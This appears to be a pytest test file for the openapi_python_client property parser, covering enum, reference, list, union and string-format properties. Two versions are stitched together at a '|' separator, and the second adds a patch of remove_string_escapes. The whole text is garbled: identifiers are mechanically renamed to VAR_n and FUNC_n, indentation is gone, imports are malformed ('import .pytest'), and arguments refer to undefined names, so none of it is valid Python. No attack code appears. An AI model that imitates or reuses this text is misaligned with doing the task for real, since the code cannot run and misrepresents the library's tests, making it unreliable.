VAR_4 = DictProperty(VAR_5="blah", VAR_26=True, default={})
assert VAR_4.default == "field(default_factory=lambda: cast(Dict[Any, Any], {}))"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import DictProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = VAR_1.MagicMock()
VAR_4 = DictProperty(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Dict",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
VAR_4.default = VAR_1.MagicMock()
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
class CLASS_10:
def FUNC_9(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = VAR_1.MagicMock(title=None)
VAR_27 = VAR_1.patch(f"{VAR_0}.EnumProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_27.values_from_list.assert_called_once_with(VAR_23.enum)
VAR_27.assert_called_once_with(
VAR_5=name, VAR_26=required, VAR_21=VAR_27.values_from_list(), default=VAR_23.default, title=VAR_5
)
assert VAR_4 == VAR_27()
VAR_27.reset_mock()
VAR_23.title = VAR_1.MagicMock()
property_from_data(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_27.assert_called_once_with(
VAR_5=name, VAR_26=required, VAR_21=VAR_27.values_from_list(), default=VAR_23.default, title=VAR_23.title
)
def FUNC_10(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Reference.construct(ref=VAR_1.MagicMock())
VAR_19 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
VAR_28 = VAR_1.patch(f"{VAR_0}.RefProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_19.assert_called_once_with(VAR_23.ref)
VAR_28.assert_called_once_with(VAR_5=name, VAR_26=required, reference=VAR_19(), default=None)
assert VAR_4 == VAR_28()
def FUNC_11(self, VAR_1):
VAR_29 = VAR_1.patch(f"{VAR_0}._string_based_property")
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == VAR_29.return_value
VAR_29.assert_called_once_with(VAR_5=name, VAR_26=required, VAR_23=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def FUNC_12(self, VAR_1, VAR_2, VAR_3):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type=VAR_2)
VAR_30 = VAR_1.patch(f"{VAR_0}.{VAR_3}")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_30.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_30()
VAR_30.reset_mock()
VAR_23.default = VAR_1.MagicMock()
property_from_data(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_30.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_13(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
VAR_31 = VAR_1.patch(f"{VAR_0}.ListProperty")
VAR_32 = VAR_1.patch(f"{VAR_0}.FloatProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_32.assert_called_once_with(VAR_5=f"{VAR_5}_item", VAR_26=True, default="0.0")
VAR_31.assert_called_once_with(
VAR_5=name, VAR_26=required, default=None, VAR_10=VAR_32.return_value
)
assert VAR_4 == VAR_31.return_value
def FUNC_14(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(VAR_23=data, detail="type array must have items defined")
def FUNC_15(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(type="array", items={},)
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(VAR_23=oai.Schema(), detail=f"invalid VAR_23 in items of array {VAR_5}")
def FUNC_16(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
VAR_33 = VAR_1.patch(f"{VAR_0}.UnionProperty")
VAR_32 = VAR_1.patch(f"{VAR_0}.FloatProperty")
VAR_34 = VAR_1.patch(f"{VAR_0}.IntProperty")
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_32.assert_called_once_with(VAR_5=name, VAR_26=required, default="0.0")
VAR_34.assert_called_once_with(VAR_5=name, VAR_26=required, default="0")
VAR_33.assert_called_once_with(
VAR_5=name,
VAR_26=required,
default=None,
inner_properties=[VAR_32.return_value, VAR_34.return_value],
)
assert VAR_4 == VAR_33.return_value
def FUNC_17(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema(anyOf=[{}])
from openapi_python_client.parser.properties import .property_from_data
VAR_4 = property_from_data(VAR_5=name, VAR_26=required, VAR_23=data)
assert VAR_4 == PropertyError(detail=f"Invalid property in union {VAR_5}", VAR_23=oai.Schema())
def FUNC_18(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type=VAR_1.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
assert property_from_data(VAR_5=name, VAR_26=required, VAR_23=data) == PropertyError(
VAR_23=data, detail=f"unknown type {VAR_23.type}"
)
def FUNC_19(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import .property_from_data
VAR_23 = oai.Schema()
assert property_from_data(VAR_5="blah", VAR_26=True, VAR_23=data) == PropertyError(
VAR_23=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
class CLASS_11:
def FUNC_20(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string")
VAR_35 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=None, default=None)
assert VAR_4 == VAR_35.return_value
VAR_35.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_23.pattern = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=VAR_23.pattern, default=VAR_23.default)
def FUNC_21(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="date-time")
VAR_36 = VAR_1.patch(f"{VAR_0}.DateTimeProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_36.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_36.return_value
VAR_36.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_36.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_22(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="date")
VAR_37 = VAR_1.patch(f"{VAR_0}.DateProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_37.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_37.return_value
VAR_37.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_37.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_23(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format="binary")
VAR_38 = VAR_1.patch(f"{VAR_0}.FileProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_38.assert_called_once_with(VAR_5=name, VAR_26=required, default=None)
assert VAR_4 == VAR_38.return_value
VAR_38.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_38.assert_called_once_with(VAR_5=name, VAR_26=required, default=VAR_23.default)
def FUNC_24(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_26 = VAR_1.MagicMock()
VAR_23 = oai.Schema.construct(type="string", schema_format=VAR_1.MagicMock())
VAR_35 = VAR_1.patch(f"{VAR_0}.StringProperty")
from openapi_python_client.parser.properties import ._string_based_property
VAR_4 = VAR_29(VAR_5=name, VAR_26=required, VAR_23=data)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=None, default=None)
assert VAR_4 == VAR_35.return_value
VAR_35.reset_mock()
VAR_23.default = VAR_1.MagicMock()
VAR_23.pattern = VAR_1.MagicMock()
VAR_29(
VAR_5=name, VAR_26=required, VAR_23=data,
)
VAR_35.assert_called_once_with(VAR_5=name, VAR_26=required, pattern=VAR_23.pattern, default=VAR_23.default)
| from datetime import date, datetime
import .pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError, ValidationError
from openapi_python_client.parser.reference import Reference
VAR_0 = "openapi_python_client.parser.properties"
class CLASS_0:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_4 = VAR_1.patch(f"{VAR_0}.Property._validate_default")
Property(VAR_6="a name", VAR_27=True, default=None)
VAR_4.assert_not_called()
Property(VAR_6="a name", VAR_27=True, default="the default value")
VAR_4.assert_called_with(default="the default value")
def FUNC_1(self):
from openapi_python_client.parser.properties import Property
VAR_5 = Property(VAR_6="test", VAR_27=True, default=None)
VAR_5._type_string = "TestType"
assert VAR_5.get_type_string() == "TestType"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[TestType]"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = Property(VAR_6=name, VAR_27=True, default=None)
VAR_8 = VAR_1.patch.object(VAR_5, "get_type_string")
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()}"
VAR_5.required = False
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()} = None"
VAR_5.default = "TEST"
assert VAR_5.to_string() == f"{VAR_7(VAR_6)}: {VAR_8()} = TEST"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = Property(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == set()
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {"from typing import Optional"}
def FUNC_4(self):
from openapi_python_client.parser.properties import Property
VAR_5 = Property(VAR_6="a name", VAR_27=True, default=None)
with pytest.raises(ValidationError):
VAR_5._validate_default("a default value")
with pytest.raises(ValidationError):
VAR_5 = Property(VAR_6="a name", VAR_27=True, default="")
class CLASS_1:
def FUNC_1(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_5 = VAR_36(VAR_6="test", VAR_27=True, default=None)
assert VAR_5.get_type_string() == "str"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[str]"
def FUNC_4(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_5 = VAR_36(VAR_6="a name", VAR_27=True, default="the default value")
assert VAR_5.default == '"the default value"'
class CLASS_2:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .DateTimeProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = VAR_37(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == {
"import datetime",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .DateTimeProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_37(VAR_6="a name", VAR_27=True, default="not a datetime")
VAR_5 = VAR_37(VAR_6="a name", VAR_27=True, default="2017-07-21T17:32:28Z")
assert VAR_5.default == "datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)"
class CLASS_3:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .DateProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_5 = VAR_38(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9="") == {
"import datetime",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .DateProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_38(VAR_6="a name", VAR_27=True, default="not a date")
VAR_5 = VAR_38(VAR_6="a name", VAR_27=True, default="1010-10-10")
assert VAR_5.default == "datetime.date(1010, 10, 10)"
class CLASS_4:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .FileProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = "blah"
VAR_5 = VAR_39(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9=prefix) == {f"from {VAR_9}.types import File", "from dataclasses import astuple"}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
f"from {VAR_9}.types import File",
"from dataclasses import astuple",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import .FileProperty
VAR_5 = VAR_39(VAR_6="a name", VAR_27=True, default=None)
with pytest.raises(ValidationError):
VAR_5 = VAR_39(VAR_6="a name", VAR_27=True, default="")
class CLASS_5:
def FUNC_4(self):
from openapi_python_client.parser.properties import .FloatProperty
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default="123.123")
assert VAR_5.default == 123.123
with pytest.raises(ValidationError):
VAR_5 = VAR_33(VAR_6="a name", VAR_27=True, default="not a float")
class CLASS_6:
def FUNC_4(self):
from openapi_python_client.parser.properties import .IntProperty
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default="123")
assert VAR_5.default == 123
with pytest.raises(ValidationError):
VAR_5 = VAR_35(VAR_6="a name", VAR_27=True, default="not an int")
class CLASS_7:
def FUNC_4(self):
from openapi_python_client.parser.properties import BooleanProperty
VAR_5 = BooleanProperty(VAR_6="a name", VAR_27=True, default=None)
VAR_5 = BooleanProperty(VAR_6="a name", VAR_27=True, default="Literally anything will work")
assert VAR_5.default == True
class CLASS_8:
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=None, VAR_10=inner_property)
assert VAR_5.get_type_string() == f"List[{VAR_11}]"
VAR_5.required = False
assert VAR_5.get_type_string() == f"Optional[List[{VAR_11}]]"
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=[], VAR_10=inner_property)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[{VAR_11}], []))"
def FUNC_5(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_12 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_12}
VAR_9 = VAR_1.MagicMock()
VAR_5 = VAR_32(VAR_6="test", VAR_27=True, default=None, VAR_10=inner_property)
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
"from typing import Optional",
}
VAR_5.default = VAR_1.MagicMock()
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_10._validate_default.return_value = "y"
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default=["x"], VAR_10=inner_property)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[{VAR_11}], ['y']))"
with pytest.raises(ValidationError):
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default="x", VAR_10=inner_property)
def FUNC_6(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty, VAR_29
VAR_13 = VAR_1.MagicMock(spec=VAR_29)
VAR_13.get_type_string.return_value = "AnEnum"
VAR_13._validate_default.return_value = "AnEnum.val1"
VAR_5 = VAR_32(VAR_6="a name", VAR_27=True, default=["val1"], VAR_10=VAR_13)
assert VAR_5.default == f"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))"
class CLASS_9:
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_1"
VAR_15 = VAR_1.MagicMock()
VAR_15.get_type_string.return_value = "inner_type_string_2"
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default=None, inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
VAR_5.required = False
assert VAR_5.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def FUNC_5(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_16 = VAR_1.MagicMock()
VAR_14.get_imports.return_value = {VAR_16}
VAR_15 = VAR_1.MagicMock()
VAR_17 = VAR_1.MagicMock()
VAR_15.get_imports.return_value = {VAR_17}
VAR_9 = VAR_1.MagicMock()
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default=None, inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_16,
VAR_17,
"from typing import Union",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
VAR_16,
VAR_17,
"from typing import Union",
"from typing import Optional",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_1"
VAR_14._validate_default.side_effect = ValidationError()
VAR_15 = VAR_1.MagicMock()
VAR_15.get_type_string.return_value = "inner_type_string_2"
VAR_15._validate_default.return_value = "the default value"
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default="a value", inner_properties=[VAR_14, VAR_15]
)
assert VAR_5.default == "the default value"
VAR_15._validate_default.side_effect = ValidationError()
with pytest.raises(ValidationError):
VAR_5 = VAR_34(
VAR_6="test", VAR_27=True, default="a value", inner_properties=[VAR_14, VAR_15]
)
class CLASS_10:
def test___post_init__(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_7 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_19 = VAR_1.MagicMock(class_name="Deduped")
VAR_20 = VAR_1.patch(
f"{VAR_0}.Reference.from_ref", side_effect=[VAR_18, VAR_19, deduped_reference]
)
from openapi_python_client.parser import .properties
VAR_21 = VAR_1.MagicMock()
properties._existing_enums = {"MyTestEnum": VAR_21}
VAR_22 = {"FIRST": "first", "SECOND": "second"}
VAR_23 = properties.EnumProperty(
VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",
)
assert VAR_23.default == "Deduped.SECOND"
assert VAR_23.python_name == VAR_7(VAR_6)
VAR_20.assert_has_calls([VAR_1.call("a_title"), VAR_1.call("MyTestEnum1")])
assert VAR_23.reference == VAR_19
assert properties._existing_enums == {"MyTestEnum": VAR_21, "Deduped": VAR_23}
assert (
properties.EnumProperty(VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",)
== VAR_23
)
assert properties._existing_enums == {"MyTestEnum": VAR_21, "Deduped": VAR_23}
VAR_21.values = VAR_22
VAR_20.reset_mock()
VAR_20.side_effect = [VAR_18]
VAR_23 = properties.EnumProperty(
VAR_6=name, VAR_27=True, default="second", VAR_22=values, title="a_title",
)
assert VAR_23.default == "MyTestEnum.SECOND"
assert VAR_23.python_name == VAR_7(VAR_6)
VAR_20.assert_called_once_with("a_title")
assert VAR_23.reference == VAR_18
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def FUNC_1(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(VAR_6="test", VAR_27=True, default=None, VAR_22={}, title="a_title")
assert VAR_23.get_type_string() == "MyTestEnum"
VAR_23.required = False
assert VAR_23.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def FUNC_3(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(VAR_6="test", VAR_27=True, default=None, VAR_22={}, title="a_title")
assert VAR_23.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}"
}
VAR_23.required = False
assert VAR_23.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def FUNC_7(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_24 = ["abc", "123", "a23", "1bc"]
VAR_25 = VAR_28.values_from_list(VAR_24)
assert VAR_25 == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def FUNC_8(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_24 = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
VAR_28.values_from_list(VAR_24)
def FUNC_9(self, VAR_1):
from openapi_python_client.parser import .properties
properties._existing_enums = VAR_1.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def FUNC_10(self):
from openapi_python_client.parser import .properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
def FUNC_4(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_18)
from openapi_python_client.parser import .properties
VAR_23 = properties.EnumProperty(
VAR_6="test", VAR_27=True, default="test", VAR_22={"TEST": "test"}, title="a_title"
)
assert VAR_23.default == "MyTestEnum.TEST"
with pytest.raises(ValidationError):
VAR_23 = properties.EnumProperty(
VAR_6="test", VAR_27=True, default="bad_val", VAR_22={"TEST": "test"}, title="a_title"
)
properties._existing_enums = {}
class CLASS_11:
def FUNC_11(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_26 = VAR_29(
VAR_6="test", VAR_27=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_26.template == "ref_property.pyi"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value="an enum")
assert VAR_26.template == "enum_property.pyi"
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_26 = VAR_29(
VAR_6="test", VAR_27=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_26.get_type_string() == "MyRefClass"
VAR_26.required = False
assert VAR_26.get_type_string() == "Optional[MyRefClass]"
def FUNC_3(self, VAR_1):
VAR_18 = VAR_1.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser.properties import .RefProperty
VAR_5 = VAR_29(VAR_6="test", VAR_27=True, default=None, reference=VAR_18)
assert VAR_5.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Dict",
"from typing import cast",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_18.module_name} import {VAR_18.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
def FUNC_4(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
with pytest.raises(ValidationError):
VAR_5 = VAR_29(VAR_6="a name", VAR_27=True, default="", reference=VAR_1.MagicMock())
VAR_23 = VAR_1.MagicMock()
VAR_23._validate_default.return_value = "val1"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value=VAR_23)
VAR_5 = VAR_29(VAR_6="a name", VAR_27=True, default="", reference=VAR_1.MagicMock())
assert VAR_5.default == "val1"
class CLASS_12:
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import DictProperty
VAR_6 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = VAR_1.MagicMock()
VAR_5 = DictProperty(VAR_6=name, VAR_27=True, default=None)
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Dict",
}
VAR_5.required = False
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
VAR_5.default = VAR_1.MagicMock()
assert VAR_5.get_imports(VAR_9=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
def FUNC_4(self):
from openapi_python_client.parser.properties import DictProperty
VAR_5 = DictProperty(VAR_6="a name", VAR_27=True, default={"key": "value"})
with pytest.raises(ValidationError):
VAR_5 = DictProperty(VAR_6="a name", VAR_27=True, default="not a dict")
class CLASS_13:
def FUNC_12(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = VAR_1.MagicMock(title=None)
VAR_28 = VAR_1.patch(f"{VAR_0}.EnumProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_28.values_from_list.assert_called_once_with(VAR_24.enum)
VAR_28.assert_called_once_with(
VAR_6=name, VAR_27=required, VAR_22=VAR_28.values_from_list(), default=VAR_24.default, title=VAR_6
)
assert VAR_5 == VAR_28()
VAR_28.reset_mock()
VAR_24.title = VAR_1.MagicMock()
property_from_data(
VAR_6=name, VAR_27=required, VAR_24=data,
)
VAR_28.assert_called_once_with(
VAR_6=name, VAR_27=required, VAR_22=VAR_28.values_from_list(), default=VAR_24.default, title=VAR_24.title
)
def FUNC_13(self, VAR_1):
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Reference.construct(ref=VAR_1.MagicMock())
VAR_20 = VAR_1.patch(f"{VAR_0}.Reference.from_ref")
VAR_29 = VAR_1.patch(f"{VAR_0}.RefProperty")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
VAR_20.assert_called_once_with(VAR_24.ref)
VAR_29.assert_called_once_with(VAR_6=name, VAR_27=required, reference=VAR_20(), default=None)
assert VAR_5 == VAR_29()
def FUNC_14(self, VAR_1):
VAR_30 = VAR_1.patch(f"{VAR_0}._string_based_property")
VAR_6 = VAR_1.MagicMock()
VAR_27 = VAR_1.MagicMock()
VAR_24 = oai.Schema.construct(type="string")
VAR_1.patch("openapi_python_client.utils.remove_string_escapes", return_value=VAR_6)
from openapi_python_client.parser.properties import .property_from_data
VAR_5 = property_from_data(VAR_6=name, VAR_27=required, VAR_24=data)
assert VAR_5 == VAR_30.return_value
